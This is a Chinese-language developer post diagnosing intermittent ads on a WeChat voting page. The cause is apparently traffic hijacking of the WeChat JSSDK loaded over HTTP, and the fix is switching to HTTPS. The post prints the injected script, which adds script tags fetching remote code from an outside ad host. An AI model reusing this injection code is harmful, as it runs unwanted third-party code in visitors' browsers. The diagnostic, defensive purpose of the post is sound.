這幾天在做一個微信的投票網頁，用的是vue+quasar UI框架，結果這幾天發現偶爾上網頁後有廣告，如下圖紅色方框

以為自己的虛擬主機被攻擊，但反覆檢查了都感覺沒啥問題，然後懷疑是不是quasar這個框架有問題，因為我第一次用這個UI框架，是外國的，看著很正規的，也是反覆查了，也沒發現什麼問題，也不是一直會出現，偶爾才出現一次，我就一直重新整理，我先是截了正常時的網路訪問狀況

不知重新整理了多久，終於刷出了廣告，看！果然有問題了，jwexin-1.2.0.js這個是微信網頁jssdk的檔案，可這個為啥下面又重新載入了還帶上了引數

我點了第一個jsweixin-1.2.0.js，果然發現了問題了，這就是生成廣告的指令碼

這是廣告js的程式碼

var _atn_obj_ = new Object; 
_atn_obj_.oldurl = 'http://res.wx.qq.com/open/js/jweixin-1.2.0.js?cHVzaA=1513177208'; 
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7My4PMz8jMzcjKzcrHoMrNzc3Lg7bfxtHO0dLOg82Dy8vPys/Pg86DzsrOzM7IyM3Px4POys7MzsjIzc/Hz8vLzs7IzYPKzcrJyw=='; 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
 

我將微信jssdk引用方式改成https，好像有點效果

<script type='text/javascript' src='https://res.wx.qq.com/open/js/jweixin-1.2.0.js'></script>